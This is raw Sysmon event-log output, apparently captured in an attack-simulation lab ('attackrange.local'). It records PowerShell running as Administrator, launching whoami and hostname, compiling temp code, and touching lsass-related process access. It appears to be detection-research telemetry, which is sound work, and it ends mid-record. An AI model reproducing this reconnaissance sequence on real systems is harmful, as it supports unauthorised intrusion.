@"C:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000024716Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.617{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.cmdline2021-06-23 21:09:48.617 11241100x800000000000000024715Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:09:48.617{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qal2myyi\qal2myyi.dll2021-06-23 21:09:48.617 10341000x800000000000000024714Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.427{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A31C-60D3-2606-00000000CF01}1680C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024713Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.427{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024712Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.427{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024711Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.427{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024710Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.427{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024709Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.427{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A31C-60D3-2606-00000000CF01}1680C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024708Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.427{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A31C-60D3-2606-00000000CF01}1680C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9ca36d54(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beabb9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64) 154100x800000000000000024707Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.432{4DB9351A-A31C-60D3-2606-00000000CF01}1680C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000024706Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.412{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A31C-60D3-2506-00000000CF01}2280C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024705Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.412{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024704Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.412{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024703Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.412{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024702Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.412{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A31C-60D3-2506-00000000CF01}2280C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024701Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.412{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024700Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.412{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A31C-60D3-2506-00000000CF01}2280C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9ca36d54(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beabb9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64) 154100x800000000000000024699Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.417{4DB9351A-A31C-60D3-2506-00000000CF01}2280C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000024788Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.771{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024787Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.771{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024786Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.724{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024785Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.724{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024784Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.724{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B921942AABED6E34BBAB122087C506AF,SHA256=B58F824C96A99919F6DE8E503B7AC36722258219B581F14654B749C188752EBE,IMPHASH=00000000000000000000000000000000falsetrue 17141700x800000000000000024783Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:49.709{4DB9351A-A31D-60D3-2A06-00000000CF01}5208\PSHost.132689561896224565.5208.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024782Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.693{4DB9351A-A31D-60D3-2A06-00000000CF01}5208ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4ixmw0td.4aq.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024781Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.693{4DB9351A-A31D-60D3-2A06-00000000CF01}5208ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_derk2emu.yik.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024780Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.677{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_derk2emu.yik.ps12021-06-23 21:09:49.677 10341000x800000000000000024779Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 